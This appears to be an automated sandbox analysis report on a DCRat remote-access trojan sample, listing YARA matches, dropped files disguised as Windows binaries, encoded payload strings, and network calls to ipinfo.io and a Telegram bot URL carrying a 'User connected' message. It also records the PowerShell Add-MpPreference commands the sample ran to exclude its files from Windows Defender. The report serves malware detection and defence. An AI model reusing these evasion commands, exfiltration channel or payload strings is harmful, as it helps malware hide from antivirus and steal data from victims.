Source: dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.0000000002AE3000.00000004.00000800.00020000.00000000.sdmp, dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.00000000025CC000.00000004.00000800.00020000.00000000.sdmp, dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/missingauth
Source: dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.00000000024F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.ioC5wbmc=
Source: powershell.exe, 00000011.00000002.3094117080.000002A2C9000000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.3046812715.000001DB2A1F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3107519937.0000028E5E320000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3010091850.0000020690070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: kQyd2z80gD.exe, 00000000.00000002.2124507684.00000000026D1000.00000004.00000800.00020000.00000000.sdmp, dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.00000000024F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/vavaaffBOT
Source: dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.0000000002608000.00000004.00000800.00020000.00000000.sdmp, dLErkomWRcaRguaKAMtYMnt.exe, 0000001D.00000002.3509612043.00000000025FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/vavaaffBOT&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%20c81b0

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706

Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49708 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: kQyd2z80gD.exe, type: SAMPLE	Matched rule: DCRat payload Author: ditekSHen
Source: 0.0.kQyd2z80gD.exe.2b0000.0.unpack, type: UNPACKEDPE	Matched rule: DCRat payload Author: ditekSHen
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe, type: DROPPED	Matched rule: DCRat payload Author: ditekSHen
Source: C:\Recovery\SearchApp.exe, type: DROPPED	Matched rule: DCRat payload Author: ditekSHen
Source: C:\Recovery\SearchApp.exe, type: DROPPED	Matched rule: DCRat payload Author: ditekSHen
Source: C:\Recovery\SearchApp.exe, type: DROPPED	Matched rule: DCRat payload Author: ditekSHen
Source: C:\Recovery\SearchApp.exe, type: DROPPED	Matched rule: DCRat payload Author: ditekSHen
Source: C:\Recovery\WmiPrvSE.exe, type: DROPPED	Matched rule: DCRat payload Author: ditekSHen

.NET source code contains very large strings

Source: kQyd2z80gD.exe, Ba5.cs

Long String: Length: 103724

Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Code function: 0_2_00007FF848F10F88	0_2_00007FF848F10F88
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_00007FF848FE30E9	24_2_00007FF848FE30E9
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Code function: 29_2_00007FF848F2BED0	29_2_00007FF848F2BED0
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Code function: 29_2_00007FF848F25141	29_2_00007FF848F25141
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Code function: 29_2_00007FF848F290B4	29_2_00007FF848F290B4
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Code function: 30_2_00007FF848F30F80	30_2_00007FF848F30F80
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Code function: 31_2_00007FF848F40F88	31_2_00007FF848F40F88
Source: C:\Recovery\SearchApp.exe	Code function: 32_2_00007FF848F20F88	32_2_00007FF848F20F88
Source: C:\Recovery\SearchApp.exe	Code function: 33_2_00007FF848F35141	33_2_00007FF848F35141
Source: C:\Recovery\WmiPrvSE.exe	Code function: 34_2_00007FF848F35141	34_2_00007FF848F35141
Source: C:\Recovery\WmiPrvSE.exe	Code function: 35_2_00007FF848F25141	35_2_00007FF848F25141
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Code function: 38_2_00007FF848F15141	38_2_00007FF848F15141
Source: C:\Recovery\WmiPrvSE.exe	Code function: 39_2_00007FF848F45141	39_2_00007FF848F45141
Source: C:\Recovery\SearchApp.exe	Code function: 40_2_00007FF848F00F80	40_2_00007FF848F00F80
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Code function: 42_2_00007FF848F25141	42_2_00007FF848F25141
Source: C:\Recovery\WmiPrvSE.exe	Code function: 44_2_00007FF848F25141	44_2_00007FF848F25141
Source: C:\Recovery\SearchApp.exe	Code function: 45_2_00007FF848F25141	45_2_00007FF848F25141
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Code function: 46_2_00007FF848F25141	46_2_00007FF848F25141
Source: C:\Recovery\WmiPrvSE.exe	Code function: 47_2_00007FF848F15141	47_2_00007FF848F15141
Source: C:\Recovery\SearchApp.exe	Code function: 48_2_00007FF848F05141	48_2_00007FF848F05141
Source: C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe	Code function: 49_2_00007FF848F25141	49_2_00007FF848F25141
Source: C:\Recovery\WmiPrvSE.exe	Code function: 50_2_00007FF848F35141	50_2_00007FF848F35141
Source: C:\Recovery\SearchApp.exe	Code function: 51_2_00007FF848F15141	51_2_00007FF848F15141

Source: kQyd2z80gD.exe	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: dLErkomWRcaRguaKAMtYMnt.exe.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: dLErkomWRcaRguaKAMtYMnt.exe0.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: WmiPrvSE.exe.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: SearchApp.exe.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: kQyd2z80gD.exe, 00000000.00000002.2124307061.0000000002600000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename( vs kQyd2z80gD.exe
Source: kQyd2z80gD.exe, 00000000.00000002.2123635421.0000000000B10000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameVPNGrabber.dclib4 vs kQyd2z80gD.exe
Source: kQyd2z80gD.exe, 00000000.00000002.2123678135.0000000000B20000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename( vs kQyd2z80gD.exe
Source: kQyd2z80gD.exe, 00000000.00000002.2158911179.000000001B8FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs kQyd2z80gD.exe
Source: kQyd2z80gD.exe, 00000000.00000000.2044775653.0000000000334000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs kQyd2z80gD.exe
Source: kQyd2z80gD.exe, 00000000.00000002.2123601717.0000000000B00000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameUSBSpread.dll4 vs kQyd2z80gD.exe
Source: kQyd2z80gD.exe	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs kQyd2z80gD.exe

Source: kQyd2z80gD.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: kQyd2z80gD.exe, type: SAMPLE	Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
Source: 0.0.kQyd2z80gD.exe.2b0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe, type: DROPPED	Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
Source: C:\Recovery\SearchApp.exe, type: DROPPED	Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
Source: C:\Recovery\SearchApp.exe, type: DROPPED	Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
Source: C:\Recovery\SearchApp.exe, type: DROPPED	Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
Source: C:\Recovery\SearchApp.exe, type: DROPPED	Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
Source: C:\Recovery\WmiPrvSE.exe, type: DROPPED	Matched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload

Source: kQyd2z80gD.exe, Q69.cs	Cryptographic APIs: 'TransformBlock'
Source: kQyd2z80gD.exe, Q69.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: kQyd2z80gD.exe, Q69.cs	Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'

Source: kQyd2z80gD.exe, 277.cs	Base64 encoded string: 'H4sIAAAAAAAEAF2UzXabMBCFHygbwHVSL7pIHIOlxriWQQjtjGwHsMD0QPz39BX1VVOy4Bx9mpk7MxqJH46Qt0uSVk1JZv6BtLGnWr+Sj+QaRUOOX+j0rXBqothI5XJGuuc1vfJAtpOK3ajR4ZwWZ70szv7G8QN1DCuVc08ZftO8Vo7JoSaV/NCeGodG57KWLp1vH8lUHKhITzRQzcVLB/5slB3DOtO8UuWXmPwSZE0jZKsrOYyp1Cn0VMOqgX/nJ9L5otH5lap5kGl237dnoXStTqbPJh9qlOGQb67JJb/s9fm3I3UzZzCoKxSy6bzsBI1/ufxgm7Nk57yITOt51vrJxjHncTY9n8aebOhUfM5hKvQl2VSm5nqcbG6TPlakh7BWOhxtT7ROtRTpzcQ80WJZqAN7DfmqOBeLR1LEvJ/pc7ksFu5qauZ5PZYkDnkUmbX7d+3Gxfmztjmdsf85ZD5b9PeAVDtnlSxqmaiO1SplwSLKReYQX3bvnMWcR3vqrmZ9DWBTAylMjrk/4/16Ymp8MP30PSV9j/08wFNwDu7AH+Bv4O8UTO78BLuAXYND8A7+r+B38Nzqwd8H72E/gyvYA3ALLqweuAUfwRvwM/Rm4N+wj6F1ADPYG3AMLsEc/AC90s57pePXF01ast6bt/gT7zHr76H5VmAO/nVnHoPTO7tgvYf/Anaw3oEJ2OojH7f+b7BHWNt81h//C57c2V0i3xps9aHHwe4GetDnYG4Z8Vog3upZRn8c9bq2PtSjU9gth8Zn19/d2NzpiF53fwB72RAKOAUAAA==', 'H4sIAAAAAAAEAA3LwQrCIBgA4Fcx3ELF30sFjVk4crcJXdZuU8godimoZoL47O27f4eMIICgQjJ4g1Mflg21TL7IynCi5dyj67dNPu+cwfeJp4yLeS9osLV/jssD7UQQwMng0ra9nNigYu7PTeV8XM7Gou5XaIqNWk9V7Mqm9vlxhBKcgTHe/oQDLE+AAAAA'
Source: kQyd2z80gD.exe, kJk.cs	Base64 encoded string: 'ICBfX18gICAgICAgICAgIF8gICAgICBfX18gICAgICAgICAgICAgXyAgICAgICAgXyAgIF9fXyAgICBfIF9fX19fIA0KIHwgICBcIF9fIF8gXyBffCB8X18gIC8gX198XyBfIF8gIF8gX198IHxfIF9fIF98IHwgfCBfIFwgIC9fXF8gICBffA0KIHwgfCkgLyBfYCB8ICdffCAvIC8gfCAoX198ICdffCB8fCAoXy08ICBfLyBfYCB8IHwgfCAgIC8gLyBfIFx8IHwgIA0KIHxfX18vXF9fLF98X3wgfF9cX1wgIFxfX198X3wgIFxfLCAvX18vXF9fXF9fLF98X3wgfF98X1wvXy8gXF9cX3wgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHxfXy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA=='
Source: kQyd2z80gD.exe, Ba5.cs	Base64 encoded string: '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

Source: classification engine

Classification label: mal100.troj.evad.winEXE@40/41@3/3

Source: C:\Users\user\Desktop\kQyd2z80gD.exe

File created: C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe

Jump to behavior

Source: C:\Recovery\SearchApp.exe	Mutant created: NULL
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\560b0e5b1b9bed5c5a756acf7264b6dea70172cd

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zbjifgl4.kjf.ps1

Jump to behavior

Source: kQyd2z80gD.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: kQyd2z80gD.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%

Source: C:\Users\user\Desktop\kQyd2z80gD.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\kQyd2z80gD.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\kQyd2z80gD.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: kQyd2z80gD.exe

ReversingLabs: Detection: 81%

Source: C:\Users\user\Desktop\kQyd2z80gD.exe

File read: C:\Users\user\Desktop\kQyd2z80gD.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\kQyd2z80gD.exe "C:\Users\user\Desktop\kQyd2z80gD.exe"
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\kQyd2z80gD.exe'
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WmiPrvSE.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SearchApp.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process created: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe "C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe"
Source: unknown	Process created: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe
Source: unknown	Process created: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe
Source: unknown	Process created: C:\Recovery\SearchApp.exe C:\Recovery\SearchApp.exe
Source: unknown	Process created: C:\Recovery\SearchApp.exe C:\Recovery\SearchApp.exe
Source: unknown	Process created: C:\Recovery\WmiPrvSE.exe C:\Recovery\WmiPrvSE.exe
Source: unknown	Process created: C:\Recovery\WmiPrvSE.exe C:\Recovery\WmiPrvSE.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe "C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe"
Source: unknown	Process created: C:\Recovery\WmiPrvSE.exe "C:\Recovery\WmiPrvSE.exe"
Source: unknown	Process created: C:\Recovery\SearchApp.exe "C:\Recovery\SearchApp.exe"
Source: unknown	Process created: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe "C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe"
Source: unknown	Process created: C:\Recovery\WmiPrvSE.exe "C:\Recovery\WmiPrvSE.exe"
Source: unknown	Process created: C:\Recovery\SearchApp.exe "C:\Recovery\SearchApp.exe"
Source: unknown	Process created: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe "C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe"
Source: unknown	Process created: C:\Recovery\WmiPrvSE.exe "C:\Recovery\WmiPrvSE.exe"
Source: unknown	Process created: C:\Recovery\SearchApp.exe "C:\Recovery\SearchApp.exe"
Source: unknown	Process created: C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe "C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe"
Source: unknown	Process created: C:\Recovery\WmiPrvSE.exe "C:\Recovery\WmiPrvSE.exe"
Source: unknown	Process created: C:\Recovery\SearchApp.exe "C:\Recovery\SearchApp.exe"
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\kQyd2z80gD.exe'	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe'	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WmiPrvSE.exe'	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SearchApp.exe'	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe'	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe'	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Process created: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe "C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe"	Jump to behavior

Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Section loaded: windows.storage.dll	Jump to behavior
